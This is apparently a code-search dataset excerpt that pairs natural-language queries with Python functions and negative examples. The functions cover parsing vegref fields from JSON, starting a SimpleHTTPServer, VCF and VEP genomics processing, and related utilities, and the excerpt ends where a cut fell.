query
stringlengths 9
9.05k
| document
stringlengths 10
222k
| negatives
listlengths 19
20
| metadata
dict |
---|---|---|---|
This function will return the from_vegref from the converted DAU data. Returns a list
|
def get_from_vegref(file_name_path):
open_data = json.load(open(file_name_path))
from_vegrefs = []
for feature in open_data["features"]:
properties = feature["properties"]
from_vegrefs.append(str(properties["from_vegref"]))
return convert_vegref(from_vegrefs)
|
[
"def get_to_vegref(file_name_path):\n open_data = json.load(open(file_name_path))\n to_vegrefs = []\n\n for feature in open_data[\"features\"]:\n properties = feature[\"properties\"]\n to_vegrefs.append(str(properties[\"to_vegref\"]))\n return convert_vegref(to_vegrefs)",
"def get_reference(self):\n field_list = [field for field in self.fields if field.startswith('select_reference_')]\n field_list.sort(key=lambda x: (x.split('_')[-2], x.split('_')[-1]))\n results = {}\n for field in field_list:\n i_dataset = field.split('_')[-2]\n if i_dataset not in results:\n results[i_dataset] = [self.fields[field].initial]\n else:\n results[i_dataset].append(self.fields[field].initial)\n results_list = [[k, v] for k, v in results.items()]\n results_list.sort(key=lambda x: x[0])\n return [v for k, v in results_list]",
"def getVONamesFromUsageRecord(ure):\n # for some reason the followng fails :-/\n # >>> ur.getroot().findall(VO_NAME)\n # so we do it the silly way and iterate over the tree instead.\n\n vos = []\n for e in ure.getroot():\n if e.tag == ur.USER_IDENTITY:\n for f in e:\n if f.tag == ur.VO:\n for g in f:\n if g.tag == ur.VO_NAME:\n vos.append(g.text)\n return vos",
"def parseRefSeq(RefseqToEntrez):\n\tconvert = []\n\tx = open(RefseqToEntrez)\n\tfor line in x:\n\t\tline = line.rstrip(\"\\n\")\n\t\tline = line.split(\"\\t\")\n\t\tif (line[0] == \"#RefSeq_ID\"):\n\t\t\tcontinue\n\t\tconvert.append(line)\n\tx.close()\n\treturn (convert)",
"def __dfsify_branch_uv(u, v, dfs_data):\n buv = B(u, v, dfs_data)\n new_list = []\n for edge_id in buv:\n edge = dfs_data['graph'].get_edge(edge_id)\n j, k = edge['vertices']\n d_x = D(j, dfs_data)\n d_y = D(k, dfs_data)\n if d_x < d_y:\n smaller = d_x\n larger = d_y\n else:\n smaller = d_y\n larger = d_x\n frond = (smaller, larger)\n new_list.append(frond)\n return new_list",
"def getUVs(self):\n if self.uvs:\n for uv in self.uvs:\n yield uv.u, uv.v\n elif self.uvsData:\n for uv in self.uvsData.uvs:\n yield uv.u, 1.0 - uv.v # OpenGL fix!",
"def get_lux_referencedata(ref_path=None):\n if ref_path == None:\n ref_path = '//ewtl2/work/_EWTL Software/Python/Reference data/'\n Lux_10 = np.genfromtxt(ref_path + 'Lux_data.dat', skip_header=7, skip_footer=421,\n usecols=(0, 1), unpack=True)\n Lux_1 = np.genfromtxt(ref_path + 'Lux_data.dat', skip_header=32, skip_footer=402,\n usecols=(0, 1), unpack=True)\n Lux_01 = np.genfromtxt(ref_path + 'Lux_data.dat', skip_header=51,\n skip_footer=388, usecols=(0, 1), unpack=True)\n Lux_001 = np.genfromtxt(ref_path + 'Lux_data.dat', skip_header=65,\n skip_footer=375, usecols=(0, 1), unpack=True)\n Lux_obs_smooth = np.genfromtxt(ref_path + 'Lux_data.dat', skip_header=78,\n skip_footer=317, usecols=(0, 1), unpack=True)\n Lux_obs_rough = np.genfromtxt(ref_path + 'Lux_data.dat', skip_header=136,\n skip_footer=276, usecols=(0, 1), unpack=True)\n\n return Lux_10, Lux_1, Lux_01, Lux_001, Lux_obs_smooth, Lux_obs_rough",
"def resolveVariant(self,ref,alt,start,chrom):\n\n ref_end = start + len(ref)\n alt_end = start + len(alt)\n\n if chrom[start:ref_end] == ref: \n return [True,ref,alt,'',0]\n elif chrom[start:alt_end] == alt:\n return [True,alt,ref,'ref_alt_rev',1] \n elif ref != '-' and chrom[start:ref_end] == Seq(ref).reverse_complement().tostring():\n ref = Seq(ref).reverse_complement().tostring()\n alt = Seq(alt).reverse_complement().tostring()\n return [True,ref,alt,'neg_strand',2] \n elif alt != '-' and chrom[start:alt_end] == Seq(alt).reverse_complement().tostring():\n ref = Seq(ref).reverse_complement().tostring()\n alt = Seq(alt).reverse_complement().tostring()\n return [True,alt,ref,'neg_strand_ref_alt_rev',3] \n else:\n refStart = start - 5\n refStop = max(ref_end,alt_end) + 6\n print ref+'\\t'+alt+'\\t'+str(start)+'\\t'+ str(ref_end)+'\\t'+str(alt_end)+'\\t'\n #return [False,ref,alt,'unknown - ref:'+chrom[start:max(ref_end,alt_end)],-1 ]\n return [False,ref,alt,'unknown - ref:'+chrom[start-5:start+6],-1 ]",
"def get_vtu_ref(flml_file):\n \n tree = ET.parse(flml_file+'.flml')\n root = tree.getroot()\n\n res = root.find('material_phase').find('scalar_field').find('prognostic').find('initial_condition').find('from_file').get('file_name')\n\n return res",
"def get_turb_referencedata(component, ref_path=None):\n if ref_path == None:\n ref_path = '//ewtl2/work/_EWTL Software/Python/Reference data/'\n ### READ turbulence intensity - reference: VDI\n if component == 'I_u':\n I_u_slight = np.genfromtxt(ref_path + 'Iu_data.dat', skip_header=11,\n skip_footer=367, usecols=(0, 1), unpack=True, encoding='latin1')\n I_u_moderate = np.genfromtxt(ref_path + 'Iu_data.dat', skip_header=41,\n skip_footer=337, usecols=(0, 1), unpack=True, encoding='latin1')\n I_u_rough = np.genfromtxt(ref_path + 'Iu_data.dat', skip_header=69,\n skip_footer=310, usecols=(0, 1), unpack=True, encoding='latin1')\n I_u_very = np.genfromtxt(ref_path + 'Iu_data.dat', skip_header=103,\n skip_footer=269, usecols=(0, 1), unpack=True, encoding='latin1')\n\n return I_u_slight, I_u_moderate, I_u_rough, I_u_very\n\n if component == 'I_v':\n I_v_slight = np.genfromtxt(ref_path + 'Iv_data.dat', skip_header=7,\n skip_footer=40, usecols=(0, 1), unpack=True, encoding='latin1')\n I_v_moderate = np.genfromtxt(ref_path + 'Iv_data.dat', skip_header=20,\n skip_footer=29, usecols=(0, 1), unpack=True, encoding='latin1')\n I_v_rough = np.genfromtxt(ref_path + 'Iv_data.dat', skip_header=31,\n skip_footer=15, usecols=(0, 1), unpack=True, encoding='latin1')\n I_v_very = np.genfromtxt(ref_path + 'Iv_data.dat', skip_header=45,\n skip_footer=0, usecols=(0, 1), unpack=True, encoding='latin1')\n\n return I_v_slight, I_v_moderate, I_v_rough, I_v_very\n\n if component == 'I_w':\n I_w_slight = np.genfromtxt(ref_path + 'Iw_data.dat', skip_header=11,\n skip_footer=347, usecols=(0, 1), unpack=True, encoding='latin1')\n I_w_moderate = np.genfromtxt(ref_path + 'Iw_data.dat', skip_header=37,\n skip_footer=321, usecols=(0, 1), unpack=True, encoding='latin1')\n I_w_rough = np.genfromtxt(ref_path + 'Iw_data.dat', skip_header=63,\n skip_footer=295, usecols=(0, 1), unpack=True, encoding='latin1')\n I_w_very = np.genfromtxt(ref_path + 'Iw_data.dat', skip_header=89,\n skip_footer=269, usecols=(0, 1), unpack=True, encoding='latin1')\n\n return I_w_slight, I_w_moderate, I_w_rough, I_w_very",
"def _makeDataRefList(self, namespace):\n keysCoadd = namespace.butler.getKeys(datasetType=namespace.config.coaddName + \"Coadd\",\n level=self._dataRefLevel)\n keysCoaddTempExp = namespace.butler.getKeys(datasetType=namespace.config.coaddName + \"Coadd_tempExp\",\n level=self._dataRefLevel)\n\n if namespace.config.doMatchBackgrounds:\n if namespace.config.autoReference: #matcher will pick it's own reference image\n namespace.datasetType = namespace.config.coaddName + \"Coadd\"\n validKeys = keysCoadd\n else:\n namespace.datasetType = namespace.config.coaddName + \"Coadd_tempExp\"\n validKeys = keysCoaddTempExp\n else: #bkg subtracted coadd\n namespace.datasetType = namespace.config.coaddName + \"Coadd\"\n validKeys = keysCoadd\n\n namespace.dataRefList = []\n for dataId in namespace.dataIdList:\n # tract and patch are required\n for key in validKeys:\n if key not in dataId:\n self.error(\"--id must include \" + key)\n\n for key in dataId: # check if users supplied visit/run\n if (key not in keysCoadd) and (key in keysCoaddTempExp): #user supplied a visit/run\n # user probably meant: autoReference = False\n namespace.config.autoReference = False\n namespace.datasetType = namespace.config.coaddName + \"Coadd_tempExp\"\n print \"Switching config.autoReference to False. \" \\\n \"Applies only to background Matching. \"\n\n dataRef = namespace.butler.dataRef(\n datasetType = namespace.datasetType,\n dataId = dataId,\n )\n namespace.dataRefList.append(dataRef)",
"def get_vep_df_for_vcf_df(vcf_df, outdir, reference_genome, gff_with_biotype, mitochondrial_chromosome, mitochondrial_code, gDNA_code, replace):\n\n # define the prefix\n prefix = \"%s/vep_%i_to_%i\"%(outdir, vcf_df.index[0], vcf_df.index[-1])\n\n # define the vcf file\n vcf_file = \"%s_variants.vcf\"%prefix\n\n # define the annotated_vcf \n annotated_vcf = \"%s_annotated.tab\"%vcf_file; annotated_vcf_tmp = \"%s.tmp\"%annotated_vcf\n\n if file_is_empty(annotated_vcf) or replace is True:\n print_if_verbose(\"running vep for %s\"%vcf_file)\n\n # clean previous files\n for f in os.listdir(outdir):\n path = \"%s/%s\"%(outdir, f)\n if path.startswith(prefix) and path!=annotated_vcf: remove_file(path)\n\n # generate the raw vcf\n vcf_df.to_csv(vcf_file, sep=\"\\t\", index=False, header=True)\n\n # run vep for this vcf\n vep_std = \"%s_annotating_vep.std\"%prefix\n vep_cmd = \"%s --input_vcf %s --outfile %s --ref %s --gff %s --mitochondrial_chromosome %s --mito_code %i --gDNA_code %i\"%(run_vep, vcf_file, annotated_vcf_tmp, reference_genome, gff_with_biotype, mitochondrial_chromosome, mitochondrial_code, gDNA_code)\n \n if log_file_all_cmds is not None: vep_cmd += \" --log_file_all_cmds %s\"%log_file_all_cmds\n vep_cmd += \" > %s 2>&1\"%vep_std\n run_cmd(vep_cmd)\n\n # print a warning if all the variants are intergenic\n df_vep = pd.read_csv(annotated_vcf_tmp, sep=\"\\t\")\n if all(df_vep.Consequence==\"intergenic_variant\"): print_with_runtime(\"!!!! WARNING !!!!! All the variants annotated by VEP are intergenic for a chunk of variants (those from '%s'). This suggests that the input files may not be properly formatted. If all the chunks are like this you can probably not trust the output\"%prefix)\n\n # check that the std contains no signs of compressing the gff\n if any([\"compressing gff before running vep\" in l for l in open(vep_std, \"r\").readlines()]): raise ValueError(\"There was a compression of the gff before running vep. This is not acceptable when running in parallel\") \n\n # print the VEP warnings, which can be useful to debug\n vep_warnings = \"\".join([l for l in open(vep_std, \"r\").readlines() if \"WARNING\" in l.upper()])\n if len(vep_warnings)>0: print_with_runtime(\"\\n---There are WARNING's in VEP:\\n%s\\n---\"%(vep_warnings))\n\n remove_file(vep_std)\n\n # keep\n os.rename(annotated_vcf_tmp, annotated_vcf)\n\n # remove all the files that are related to this prefix\n for f in os.listdir(outdir):\n path = \"%s/%s\"%(outdir, f)\n if path.startswith(prefix) and path!=annotated_vcf: remove_file(path)\n\n # load the vep df\n df_vep = pd.read_csv(annotated_vcf, sep=\"\\t\")\n\n return df_vep",
"def fasta2vcf(f):\r\n\tmy_dict = {}\r\n\tfor r in SeqIO.parse(f, \"fasta\"):\r\n\t\tmy_dict[r.id] = str(r.seq).upper()\r\n\tprint (my_dict)\r\n\tvcf = pd.DataFrame()\r\n\tindex_list = []\r\n\tchr_list = []\r\n\tpos_list = []\r\n\tref_list = []\r\n\talt_list = []\r\n\tseq_list = []\r\n\tfor k in my_dict:\r\n\t\tif not \"_ref\" in k:\r\n\t\t\tcontinue\r\n\t\tname = k.replace(\"_ref\",\"\")\r\n\t\tif not name+\"_alt\" in my_dict:\r\n\t\t\tprint (k,\"alt sequence not found. Please use _ref and _alt keywords. Skip...\")\r\n\t\t\tcontinue\r\n\t\tref_seq,alt_seq = my_dict[k],my_dict[name+\"_alt\"]\r\n\t\tif len(ref_seq) < 30:\r\n\t\t\tprint (k,\"Please input sequence length at least 30bp. Skip...\")\r\n\t\t\tcontinue\r\n\t\tif ref_seq == alt_seq:\r\n\t\t\tprint (k,\"Ref and Alt sequence is the same. Please check. Skip...\")\r\n\t\t\tcontinue\r\n\t\tpos,ref,alt = find_pos_ref_alt(ref_seq,alt_seq)\r\n\t\tindex_list.append(name)\r\n\t\tchr_list.append(k)\r\n\t\tseq_list.append(ref_seq)\r\n\t\tpos_list.append(pos)\r\n\t\tref_list.append(ref)\r\n\t\talt_list.append(alt)\r\n\tvcf[0] = chr_list\r\n\tvcf[1] = pos_list\r\n\tvcf[2] = index_list\r\n\tvcf[3] = ref_list\r\n\tvcf[4] = alt_list\r\n\tvcf[5] = seq_list\r\n\tvcf = vcf[vcf[1]!=-1]\r\n\tif vcf.shape[0] == 0:\r\n\t\tprint (\"no valid sequences in:\",f)\r\n\t\tprint (\"Exit...\")\r\n\t\tsys.exit(1)\r\n\r\n\treturn vcf",
"def DMI_refet_data(self, data):\n self.refet_df = None\n if '%p' in data.refet['name_format']:\n refet_path = os.path.join(data.refet['ws'], data.refet['name_format'].replace('%p', data.refet['fnspec']))\n else:\n refet_path = os.path.join(data.refet['ws'], data.refet['name_format'])\n if not os.path.isfile(refet_path):\n logging.error('ERROR: Reference ET data path {0} does not exist'.format(refet_path))\n return False\n logging.debug(' Reference ET path is {0}'.format(refet_path))\n if data.refet['data_structure_type'].upper() == 'PF S.P':\n if data.refet['file_type'].lower() == 'csf':\n param_df = mod_dmis.ReadOneColumnSlot(\n refet_path, data.refet['header_lines'], data.refet['names_line'],\n self.refet_id, data.refet['fields']['etref'], data.refet['units']['etref'], 1.0,\n 'day', 1, data.refet['delimiter'], data.start_dt, data.end_dt)\n elif data.refet['file_type'].lower() == 'rdb':\n param_df = mod_dmis.ReadOneTextRDB(\n refet_path, data.refet['header_lines'], data.refet['names_line'],\n self.refet_id, data.refet['fields']['etref'], data.refet['units']['etref'], 1.0,\n 'day', 1, data.refet['delimiter'], data.start_dt, data.end_dt)\n elif data.refet['file_type'].lower() == 'xls' or data.refet['file_type'].lower() == 'wb':\n param_df = mod_dmis.ReadOneExcelColumn(\n refet_path, data.refet['wsspec'], data.refet['header_lines'], data.refet['names_line'],\n self.refet_id, data.refet['fields']['etref'], data.refet['units']['etref'], 1.0,\n 'day', 1, data.start_dt, data.end_dt)\n else:\n logging.error('ERROR: File type {} is not supported'.format(data.refet['file_type']))\n return False\n if param_df is None:\n logging.error('ERROR: unable to read {}'.format(refet_path))\n return False\n else:\n self.refet_df = mod_dmis.make_ts_dataframe('day', 1, data.start_dt, data.end_dt)\n self.refet_df['etref'] = param_df[[0]].values\n return True",
"def get_feature_vector(self,gesture):\n vector = []\n for generator in feature_generators:\n vector.append(generator(gesture))\n\n return [i for i in utils.flatten(vector)]",
"def _parse_lovd_variants_by_gene_name_response(xml_blob):\n entries = xmltodict.parse(xml_blob)['feed']['entry']\n out = []\n for entry in entries:\n out.append(_parse_entry(entry))\n return out",
"def collect_ref_data(app, doctree):\n filename = doctree.attributes[\"source\"]\n\n # this needs to happen to make this work with sphinx-multiversion\n metadata = app.config.smv_metadata or {}\n current_version = app.config.smv_current_version\n if metadata and current_version:\n sourcedir = metadata.get(current_version, {}).get(\"sourcedir\")\n if sourcedir and filename.startswith(sourcedir):\n filename = filename[len(sourcedir) :]\n\n # otherwise lets just split off the current directory (not sphinx multiversion)\n filename = filename.replace(docs_dir, \"\").lstrip(\"/\")\n docname = filename.replace(\".md\", \"\")\n\n anchors = []\n references = []\n\n for node in doctree.traverse(nodes.raw):\n if \"name=\" in node.rawsource:\n match = re.search(r'name=\"([^\\\"]+)', node.rawsource)\n if match:\n anchors.append(match.group(1))\n elif \"id=\" in node.rawsource:\n match = re.search(r'id=\"([^\\\"]+)', node.rawsource)\n if match:\n anchors.append(match.group(1))\n\n for node in doctree.traverse(nodes.section):\n for target in frozenset(node.attributes.get(\"ids\", [])):\n anchors.append(target)\n\n for node in doctree.traverse(nodes.reference):\n uri = node.get(\"refuri\")\n if uri and not uri.startswith((\"http://\", \"https://\")):\n ref = to_reference(uri, basedoc=docname)\n references.append(ref)\n\n app.env.metadata[docname][\"anchors\"] = anchors\n app.env.metadata[docname][\"references\"] = references",
"def _get_ref(self):\n reference = []\n for concentration, ingredient in zip(\n self.concentrations, self.ingredients):\n if ingredient.role != 'Solvent':\n for fragment in ingredient.fragments:\n reference.append(fragment.symbol.lower())\n reference.append(str(round(concentration, 2)))\n\n return '-'.join(reference)",
"def G4_list(self):\n with open(self.G4_path, 'r') as f0:\n lines = f0.readlines()\n g4_ls = []\n for line in lines:\n line = line.strip()\n line = line.split('\\t')\n if line[6][0] == 'G':\n g4_ls.append(line[6])\n else:\n g4_ls.append(reverse_comp(line[6]))\n return g4_ls"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Returns a list containing the to_vegref data from a JSON file.
|
def get_to_vegref(file_name_path):
open_data = json.load(open(file_name_path))
to_vegrefs = []
for feature in open_data["features"]:
properties = feature["properties"]
to_vegrefs.append(str(properties["to_vegref"]))
return convert_vegref(to_vegrefs)
|
[
"def get_from_vegref(file_name_path):\n\n open_data = json.load(open(file_name_path))\n from_vegrefs = []\n\n for feature in open_data[\"features\"]:\n properties = feature[\"properties\"]\n from_vegrefs.append(str(properties[\"from_vegref\"]))\n return convert_vegref(from_vegrefs)",
"def jsonToList( f ):\n\tresults = []\n\tfor line in f:\n\t\tresults.append( json.loads( line ) )\n\treturn results",
"def load_event_gtracks_json(path : str)->List[GTracks]:\n # First load the json object from file\n\n with open(path) as json_file:\n jdevt = json.load(json_file)\n\n # then recreate the list of GTracks\n ETRKS = []\n for _, dGtrk in jdevt.items():\n GTRKS = []\n dgtrk = dGtrk['gtrk']\n event_id = dGtrk['event_id']\n voxel_bin = dGtrk['voxel_bin']\n contiguity = dGtrk['contiguity']\n\n for it, value in dgtrk.items():\n gt = nx.node_link_graph(value)\n GTRKS.append(GTrack(gt,\n event_id[it],\n voxel_bin[it],\n contiguity[it]))\n ETRKS.append(GTRKS)\n return ETRKS",
"def json2log():\r\n with open(json_file, 'r') as f:\r\n return json.load(f)",
"def get_lists_from_file(file_name: str) -> List:\n list_url_file = pathlib.Path.home().joinpath('bookshelf', file_name)\n if not list_url_file.is_file():\n return []\n # open file and load contents\n with list_url_file.open(mode='r') as f:\n list_urls = json.load(f)\n return list_urls",
"def getLocationData(self, filepath):\n geoData = []\n files = os.listdir(filepath)\n for afile in files:\n with open(filepath+afile) as r:\n data = json.loads(r.read())\n for entry in data:\n geoData.append(entry)\n return geoData",
"def _read_vecjson(jsonfname):\n with open(jsonfname) as data_file:\n data = json.load(data_file)\n for nm in ['body2head_rotmat', 'body2head_vec']:\n if nm in data:\n data[nm] = np.array(data[nm])\n return data",
"def urls_from_json(self, json_file_):\n\n try:\n json_data_ = helper.READ_JSON_FILE(json_file_)\n urls_ = {}\n for entry_ in json_data_:\n urls_[entry_['attachment']['href']] = entry_['created_time']\n\n return urls_\n except Exception:\n self._logger.log_error(\"Error parsing JSON\", traceback.format_exc())\n temp_ = {}\n return temp_",
"def from_json(json_file):\n with open(json_file) as inputfile:\n calendar = json.load(inputfile)\n\n vcalendars = []\n\n for rdv in calendar:\n vcal = \"BEGIN:VCALENDAR\\nVERSION:2.0\\nPRODID:-//Orage Project//Framagenda//FR\\n\"\n vcal += \"BEGIN:VEVENT\\n\"\n for key in rdv.keys():\n vcal += str(key) + \":\" + str(rdv[key]) + \"\\n\"\n # Unique ID. If two vevents start at the same time, they are the same vevent, so it is just an update\n vcal += \"UID:orage@{}\\n\".format(rdv[\"DTSTART\"])\n vcal += \"END:VEVENT\\n\"\n vcal += \"END:VCALENDAR\\n\"\n\n vcalendars.append(vcal)\n\n return vcalendars",
"def process_json_file(file_name: str, ids: List[int]) -> List[str]:\n open_file = flip(open, 'r')\n read_file = methodcaller('read')\n to_dict = json.loads\n desired_settlement_type = lambda fee: fee.get('SettlementTypeID') in ids\n\n return list(\n pipe(\n file_name,\n open_file,\n read_file,\n to_dict,\n get('fees'),\n filter(desired_settlement_type),\n map(generate_fee_assertions),\n )\n )",
"def gen_fjson(filename):\n with open(filename) as f:\n for line in f:\n try:\n yield json.loads(line)\n except:\n pass",
"def load_json_points(js):\r\n align_js = js['belt_alignment']\r\n sources = []\r\n targets = []\r\n for pair in align_js:\r\n src_js = pair['source']\r\n tgt_js = pair['target']\r\n sources.append([float(src_js['y']), float(src_js['x'])])\r\n targets.append([float(tgt_js['y']), float(tgt_js['x'])])\r\n\r\n sources = np.array(sources)\r\n targets = np.array(targets)\r\n return sources, targets",
"def jsonl(filename):\n\twith open(filename, 'r') as file_:\n\t\tfor line in file_:\n\t\t\tyield json.loads(line)",
"def get_rdf_data(file):\n with open(file) as f:\n data = json.load(f)\n return data",
"def FindURLSInJSON(json_file, gs_urls):\n output = subprocess.check_output(['svn', 'cat', json_file])\n json_content = json.loads(output)\n for dict_type in ['actual-results']:\n for result_type in json_content[dict_type]:\n if json_content[dict_type][result_type]:\n for result in json_content[dict_type][result_type].keys():\n hash_type, hash_value = json_content[dict_type][result_type][result]\n gs_url = FileNameToGSURL(result, hash_type, str(hash_value))\n if gs_urls.get(gs_url):\n gs_urls[gs_url].append(json_file)\n else:\n gs_urls[gs_url] = [json_file]",
"def _types_from_JSON(self, filename):\n\t\tfile = open(filename, mode=\"r\", encoding=\"utf-8\")\n\t\ttypes = json.loads(file.read())\n\t\tfile.close()\n\t\treturn types",
"def jsonread(filename): \n res = None",
"def load_from_json(fname):\r\n # TODO make this take a file-like as well\r\n with open(fname, \"r\") as fin:\r\n data = json.load(fin)\r\n\r\n return [StripInfo(**d) for d in data]",
"def get_contents(filename):\n _documents = []\n with open(filename) as f:\n for line in f:\n # Parse document\n doc = json.loads(line)\n # Skip if it is empty or None\n if not doc:\n continue\n # Add the document\n _documents.append((utils.normalize(doc['id']), doc['text']))\n return _documents"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Start SimpleHTTPServer as a background process from rootDir on the given component. The webserver will listen on port and if specified, output will be redirected to logDir.
|
def start( self, component, rootDir, port=8000, logDir=None ):
retValue = main.TRUE
self.rootDir = rootDir
try:
# Save component for this instance so other functions can use it
self.component = component
main.log.info( "Starting SimpleHTTPServer on " + component.name )
if component.handle:
handle = component.handle
# cd to rootDir
handle.sendline( "cd " + str( rootDir ) )
handle.expect( "\$" )
# Start server
cmd = "python -m SimpleHTTPServer {}".format( port )
if logDir:
cmd += " &> {}".format( logDir ) # pipe all output to a file
else:
cmd += "&> {dev/null}" # Throw away all output
cmd += " &"
handle.sendline( cmd )
handle.expect( "\$" )
response = handle.before
# Return to home dir
handle.sendline( "cd " + component.home )
handle.expect( "\$" )
response += handle.before
if "Exit" in response:
main.log.error( "Error starting server. Check server log for details" )
main.log.debug( handle.before )
retValue = main.FALSE
# capture PID for later use
# EX: [1] 67987
match = re.search( "\[\d\] (?P<PID>\d+)", response )
if match:
self.PID = match.group( "PID" )
else:
main.log.warn( "Could not find PID" )
else:
main.log.error( "Component handle is not set" )
retValue = main.FALSE
except Exception:
main.log.exception( "Error starting web server" )
retValue = main.FALSE
return retValue
|
[
"def start():\n port = cfg.web.port\n\n events.dispatcher.register_target(event_logger)\n\n logging.info('Starting web server: port=%d' % port)\n utils.DaemonThread(target=bottle.run,\n kwargs={'host': cfg.web.bind,\n 'port': cfg.web.port}).start()",
"def run(self, host='127.0.0.1', port=5000):\n httpd = wsgiref.simple_server.make_server('', port, self)\n log(\"PWF now running on http://%s:%s/\" % (host, port,))\n httpd.serve_forever()",
"def run(self):\n parts = urlparse(HOST_BASE)\n domain, port = parts.netloc.split(\":\")\n self.srv = make_server(domain, int(port), self.app)\n try:\n self.srv.serve_forever()\n except:\n import traceback\n traceback.print_exc()\n # Failed to start\n self.srv = None",
"def StartHttpServer(local_dir_path, host_port=0):\n assert local_dir_path\n httpd = _SilentTCPServer(('127.0.0.1', host_port),\n _GetHandlerClassForPath(local_dir_path))\n atexit.register(httpd.shutdown)\n\n http_thread = threading.Thread(target=httpd.serve_forever)\n http_thread.daemon = True\n http_thread.start()\n return httpd.server_address",
"def start(self):\n self.log('Server started...')\n self.httpd.serve_forever()",
"def run(self):\n self.server = HTTPServer(('', HttpServer.serverPort), HttpHandler)\n self.server.timeout = HttpServer.timeout\n self.server.msg_queue = self.msg_queue\n logger.warning(\"HTTP server running\")\n try:\n while True:\n self.server.handle_request()\n try:\n msg: HttpMessage = self.msg_queue.get(False)\n self.update_state(msg)\n logger.debug(\"HTTP message received\")\n except Empty:\n pass\n except Exception:\n print(sys.exc_info())\n\n logger.warning(\"HTTP server terminating\")",
"def run() -> None: # pragma: no cover\n logging.basicConfig(\n level=logging.DEBUG,\n format='%(asctime)s - %(levelname)s - %(message)s'\n )\n args = parse_user_args()\n config = wsgi_config.WSGIConfig()\n config.configure_gwsgi(args)\n httpd = make_wsgi_server(\n config.host, config.port, config.application,\n config.threading, config.processing, config.wsgiref\n )\n logging.debug(f'WSGIServer: Serving HTTP on port {config.port} ...\\n')\n httpd.serve_forever()",
"def standalone_main(port, static_dir):\n \n # load static files\n static_files = {}\n def static_walker(arg, dirname, names):\n for name in names:\n try:\n path = os.path.join(dirname, name)\n if os.path.isdir(path):\n continue\n uri = os.path.relpath(path, static_dir)\n static_files[\"/static/%s\" % uri] = open(path).read()\n except IOError:\n sys.stderr.write(\n \"* Problem loading %s\\n\" % path\n )\n os.path.walk(static_dir, static_walker, \"\")\n sys.stderr.write(\"* Static files loaded.\\n\")\n\n def red_handler (method, uri, req_hdrs, res_start, req_pause):\n p_uri = urlsplit(uri)\n if static_files.has_key(p_uri.path):\n res_body, res_done = res_start(\"200\", \"OK\", [], nbhttp.dummy)\n res_body(static_files[p_uri.path])\n res_done(None)\n elif p_uri.path == \"/\":\n query_string = cgi.parse_qs(p_uri.query)\n\n def output_hdrs (status, hdrs):\n code, phrase = status.split(None, 1)\n return res_start(code, phrase, hdrs, nbhttp.dummy)\n\n try:\n RedWebUi('/', method, query_string, output_hdrs)\n except:\n sys.stderr.write(\"\"\"\n\n*** FATAL ERROR\nRED has encountered a fatal error which it really, really can't recover from\nin standalone server mode. Details follow.\n\n\"\"\")\n except_handler_factory(sys.stderr.write)()\n sys.stderr.write(\"\\n\")\n nbhttp.stop()\n sys.exit(1)\n else:\n res_body, res_done = res_start(\n \"404\", \"Not Found\", [], nbhttp.dummy\n )\n res_done(None)\n return nbhttp.dummy, nbhttp.dummy\n\n nbhttp.Server(\"\", port, red_handler)\n \n try:\n nbhttp.run()\n except KeyboardInterrupt:\n sys.stderr.write(\"Stopping...\\n\")\n nbhttp.stop()\n # TODO: logging\n # TODO: extra resources",
"def start(self):\n self.httpd = socketserver.ThreadingTCPServer(\n (\"\", self.port), self.handler, False\n )\n self.httpd.request_queue_size = 500\n self.httpd.timeout = 2000\n self.httpd.server_bind()\n self.httpd.server_activate()\n\n if self.cert_filename != \"\" and os.path.isfile(self.cert_filename) and \\\n self.key_filename != \"\" and os.path.isfile(self.key_filename):\n self.httpd.socket = ssl.wrap_socket(\n self.httpd.socket, certfile=self.cert_filename, server_side=True,\n keyfile=self.key_filename\n )\n print(\"start serving\")\n _thread.start_new_thread(self.httpd.serve_forever, ())",
"def runserver():\n from web.server import runserver\n runserver()",
"def start_httpd(addr): # pragma: no cover\n host, port = addr.split(':')\n logging.info('Starting HTTPD on {}:{}'.format(host, port))\n prometheus_client.start_http_server(int(port), host)",
"def serve(self, port=8000):\n \n # Make a HTTP-server from the WSGI-handler\n server = make_server('', port, self.wsgi)\n \n # Run the server until terminated\n server.serve_forever()",
"def runserver():\n typer.echo(\"Starting server...\")\n\n # Webserver config settings\n config = container[Configuration]\n event_loop = container[EventLoopBase]\n hostname = config['app']['hostname'].get()\n port = config['app']['port'].get()\n # Webservice application\n app = fastapi_app\n server_config = Config(app=app, host=hostname, port=port, loop=event_loop.get_loop())\n\n # Initialize the webserver\n uvicorn_server = Server(server_config)\n event_loop.run(uvicorn_server.serve())",
"def main() -> None:\n\n start_server()",
"async def start(self):\n self._app = web.Application(\n loop=self._loop, middlewares=self._middlewares\n )\n for resource in self._nyuki.HTTP_RESOURCES:\n resource.RESOURCE_CLASS.register(self._nyuki, self._app.router)\n log.info(\"Starting the http server on {}:{}\".format(self._host, self._port))\n self._handler = self._app.make_handler(access_log=access_log)\n self._server = await self._loop.create_server(\n self._handler, host=self._host, port=self._port\n )",
"def start_http_server(port, addr=''):\n class ThreadingSimpleServer(ThreadingMixIn, HTTPServer):\n pass\n class PrometheusMetricsServer(threading.Thread):\n def run(self):\n httpd = ThreadingSimpleServer((addr, port), MetricsHandler)\n httpd.serve_forever()\n t = PrometheusMetricsServer()\n t.daemon = True\n t.start()",
"def daemon(path=\".\", address=None, port=None):\n # TODO(jelmer): Support git-daemon-export-ok and --export-all.\n backend = FileSystemBackend(path)\n server = TCPGitServer(backend, address, port)\n server.serve_forever()",
"def start_server(port: int):\n run(port)",
"def run(self):\n # Truncate the log file if it already exists.\n if os.path.exists(self.log_file):\n osutils.SafeUnlink(self.log_file, sudo=True)\n\n path_resolver = path_util.ChrootPathResolver()\n\n port = self.port if self.port else 0\n cmd = [self.devserver_bin,\n '--pidfile', path_resolver.ToChroot(self._pid_file),\n '--logfile', path_resolver.ToChroot(self.log_file),\n '--port=%d' % port,\n '--critical_update']\n\n if not self.port:\n cmd.append('--portfile=%s' % path_resolver.ToChroot(self.port_file))\n\n if self.static_dir:\n cmd.append(\n '--static_dir=%s' % path_resolver.ToChroot(self.static_dir))\n\n if self.src_image:\n cmd.append('--src_image=%s' % path_resolver.ToChroot(self.src_image))\n\n if self.board:\n cmd.append('--board=%s' % self.board)\n\n chroot_args = ['--no-ns-pid']\n result = self._RunCommand(\n cmd, enter_chroot=True, chroot_args=chroot_args,\n cwd=constants.SOURCE_ROOT, error_code_ok=True,\n redirect_stdout=True, 